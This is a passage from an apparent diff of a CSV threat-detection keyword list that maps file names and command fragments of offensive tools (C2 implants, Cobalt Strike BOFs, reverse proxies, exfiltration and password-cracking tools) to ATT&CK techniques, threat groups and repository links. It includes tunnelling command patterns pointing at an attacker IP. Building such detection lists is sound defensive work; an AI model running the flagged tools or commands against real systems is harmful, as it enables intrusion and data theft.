APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*chvancooten/nimbuild*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*chvancooten/NimPlant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*CIMplant.exe *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*CIMplant.sln*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*CIMplant-main*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" -"*cirt-default-usernames.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cirt-default-usernames.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*cirt-fuzzer*","offensive_tool_keyword","cirt-fuzzer","A simple TCP/UDP protocol fuzzer.","T1046 - T1065 - T1190 - T1219 - T1221 - T1497","TA0001 - TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Sniffing & Spoofing","https://www.ecrimelabs.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*cisco2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*cisco2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*cisco-phone-query.sh*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*Cleanup-57BFF48E-24FB-48E9-A390-AC62ADF38B07.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" "*clear_cmd","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" -"*clear_command_history.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*clear_command_history.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*ClearEventlog.vbs*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" -"*clem9669_wordlist_medium.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","191","44","2023-10-03T14:28:50Z","2020-10-21T14:37:53Z" -"*clem9669_wordlist_small.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","191","44","2023-10-03T14:28:50Z","2020-10-21T14:37:53Z" -"*-cli install github *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"*clem9669_wordlist_medium.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" +"*clem9669_wordlist_small.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" +"*-cli install github *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "*-cli install github *Apollo.*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*-cli payload start *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"*-cli payload start *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "*click_to_exploit.docx*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/drgreenthumb93/CVE-2022-30190-follina","1","1","N/A","N/A","1","10","4","2023-04-20T20:34:05Z","2022-06-01T11:37:08Z" -"*clickjack_attack.html*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*clickjack_victim.html*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*clickjack_attack.html*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*clickjack_victim.html*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*clickme*exploit.html*","offensive_tool_keyword","POC","CVE-2022-30190 Follina POC","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/onecloudemoji/CVE-2022-30190","1","1","N/A","N/A","2","107","33","2022-05-31T09:35:37Z","2022-05-31T06:45:25Z" "*client $ATTACKER-IP:$ATTACKER-PORT R:$PORT:socks*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*client.py --server-ip * --server-port *","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "*client.py*--domain*--hashes*","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "*ClipboardImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*clipboardinject.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*clipboardinject.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*clipboardinject.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*clipboard-monitor *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*clipboardinject.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*clipboardinject.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*clipboardinject.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*clipboard-monitor *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*ClipboardWindow-Inject*","offensive_tool_keyword","cobaltstrike","CLIPBRDWNDCLASS process injection technique(BOF) - execute beacon shellcode in callback","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BronzeTicket/ClipboardWindow-Inject","1","1","N/A","10","10","58","11","2022-09-15T01:41:39Z","2022-09-14T15:55:06Z" "*clipmon.sln*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","","N/A","","","" "*cloakify*","offensive_tool_keyword","cloakify","CloakifyFactory & the Cloakify Toolset - Data Exfiltration & Infiltration In Plain Sight. Evade DLP/MLS Devices. Social Engineering of Analysts. Defeat Data Whitelisting Controls. Evade AV Detection. Text-based steganography using lists. Convert any file type (e.g. executables. Office. Zip. images) into a list of everyday strings. Very simple tools. powerful concept. limited only by your imagination.","T1001 - T1003 - T1027 - T1036 - T1048 - T1052","TA0010","N/A","N/A","Data Exfiltration","https://github.com/TryCatchHCF/Cloakify","1","0","N/A","N/A","10","1440","233","2020-11-24T05:25:04Z","2016-05-07T04:52:26Z" -"*CloakNDaggerC2-main*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","10","10","4","2","2023-10-02T19:54:24Z","2023-04-28T01:58:18Z" -"*cloc.exe --exclude-dir*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*cloud_enum-master.zip*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1238","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" +"*CloakNDaggerC2-main*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","10","10","4","2","2023-10-04T12:32:38Z","2023-04-28T01:58:18Z" +"*cloc.exe --exclude-dir*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*cloud_enum-master.zip*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" "*cloudfail.py --target seo.com --tor*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*cloudFilterEOP.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - 